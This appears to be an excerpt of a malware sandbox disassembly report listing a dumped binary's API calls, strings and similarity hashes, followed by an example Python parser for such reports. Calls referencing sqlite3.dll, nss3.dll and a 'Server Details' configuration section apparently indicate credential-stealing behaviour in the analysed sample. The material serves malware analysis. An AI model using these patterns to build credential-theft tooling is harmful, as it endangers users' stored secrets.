  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
• strrchr.MSVCRT ref: 00409808
• _mbscat.MSVCRT ref: 0040981D
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FileModuleName_mbscatstrrchr
• String ID: _lng.ini
• API String ID: 3334749609-1948609170
• Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
• Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
• Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
• Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
APIs
• _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
• _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _mbscat$_mbscpystrlen
• String ID: sqlite3.dll
• API String ID: 1983510840-1155512374
• Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
• Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
• Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
• Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
APIs
• GetWindowLongA.USER32(?,000000EC), ref: 004073D0
• SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: LongWindow
• String ID: MZ@
• API String ID: 1378638983-2978689999
• Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
• Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
• Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
• Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
APIs
• GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: PrivateProfileString
• String ID: A4@$Server Details
• API String ID: 1096422788-4071850762
• Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
• Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
• Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
• Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
APIs
• memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
• memcpy.MSVCRT(?,?,?), ref: 0042C917
• memset.MSVCRT ref: 0042C932
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
• Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
• Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
• Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
APIs
• strlen.MSVCRT ref: 0040849A
• memset.MSVCRT ref: 004084D2
• memcpy.MSVCRT(?,00000000,?,?,?,?,7639E430,?,00000000), ref: 0040858F
• LocalFree.KERNEL32(00000000,?,?,?,?,7639E430,?,00000000), ref: 004085BA
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FreeLocalmemcpymemsetstrlen
• String ID:
• API String ID: 3110682361-0
• Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
• Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
• Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
• Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
APIs
• memcpy.MSVCRT(?,?,00000010), ref: 004161F4
• memcpy.MSVCRT(?,?,00000004), ref: 00416218
• memcpy.MSVCRT(?,?,00000004), ref: 0041623F
• memcpy.MSVCRT(?,?,00000008), ref: 00416265
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0
• Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
• Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
• Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
• Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
APIs
• strlen.MSVCRT ref: 0040797A
• free.MSVCRT ref: 0040799A
  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
  • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,761F0A60,00407A43,00000001,?,00000000,761F0A60,00407DBD,00000000,?,?), ref: 00406F64
  • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
• free.MSVCRT ref: 004079BD
• memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
• Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
• Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
• Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
• Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
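The per-function blocks above all follow one layout: an "APIs" list of `Function.MODULE(args), ref: address` lines (with nested "Part of subcall function" entries for callees), then "Memory Dump Source", then the "Similarity" identifiers. The parser below is example code added here; it is not part of the Joe Sandbox report or its tooling. It turns that text into records so that API and string combinations (which function references `sqlite3.dll`, which one reads the `Server Details` section) can be pivoted across many reports. The class and field names, the reading of `$` as the separator inside "String ID", and the embedded sample are this example's assumptions; the sample is constructed from two of the blocks on this page.

```python
"""Parse the per-function "APIs" blocks of a Joe Sandbox disassembly report.

Example code added to the page, not Joe Sandbox's own code; the report ships no
parser. Class and field names are this example's choices, and SAMPLE is
constructed from two blocks in the layout the report uses.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample: two blocks in the report's layout (bullet, call, ref).
SAMPLE = """\
APIs
• GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: PrivateProfileString
• String ID: A4@$Server Details
• API String ID: 1096422788-4071850762
APIs
• _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
• _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _mbscat$_mbscpystrlen
• String ID: sqlite3.dll
• API String ID: 1983510840-1155512374
"""

# A call line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Function.MODULE, optional "(args)", then "ref: <8 hex digits>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<fn>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# Any other bulleted "Key: value" line (API ID, String ID, Source File, ...).
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    function: str
    module: str
    args: List[str]
    ref: str                  # call-site address inside the dumped image
    subcall: Optional[str]    # parent function address for nested "Part of subcall" lines


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def strings(self) -> List[str]:
        # Assumption: '$' separates several strings in "String ID"; on the page
        # "A4@$Server Details" splits into the two literals seen in the call args.
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the report text at each bare "APIs" header and parse what follows."""
    blocks: List[FunctionBlock] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append(FunctionBlock())
            continue
        if not blocks:
            continue                      # text before the first block
        call = CALL_RE.match(line)
        if call:
            args = [a for a in (call["args"] or "").split(",") if a]
            blocks[-1].calls.append(
                ApiCall(call["fn"], call["mod"], args, call["ref"].upper(), call["sub"]))
            continue
        kv = KV_RE.match(line)
        if kv:
            blocks[-1].fields[kv["key"].strip()] = kv["val"].strip()
    return blocks


def blocks_referencing(blocks: List[FunctionBlock], needle: str) -> List[int]:
    """Indices of blocks whose call arguments or String ID mention `needle`."""
    return [i for i, b in enumerate(blocks)
            if needle in b.strings or any(needle in a for c in b.calls for a in c.args)]


def imports_by_module(blocks: List[FunctionBlock]) -> Dict[str, Set[str]]:
    """Map each module (KERNEL32, MSVCRT, ...) to the functions called from it."""
    out: Dict[str, Set[str]] = {}
    for b in blocks:
        for c in b.calls:
            out.setdefault(c.module, set()).add(c.function)
    return out


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for i, b in enumerate(parsed):
        print(i, b.fields.get("API ID"), b.strings, [(c.function, c.ref) for c in b.calls])
    print(blocks_referencing(parsed, "sqlite3.dll"), imports_by_module(parsed))
```

Feed it the text of a whole report section and the `ref` addresses give you the call sites to jump to in a disassembler, while `imports_by_module` gives a quick import-style summary of a memory dump whose real import table may have been destroyed by the unpacking step.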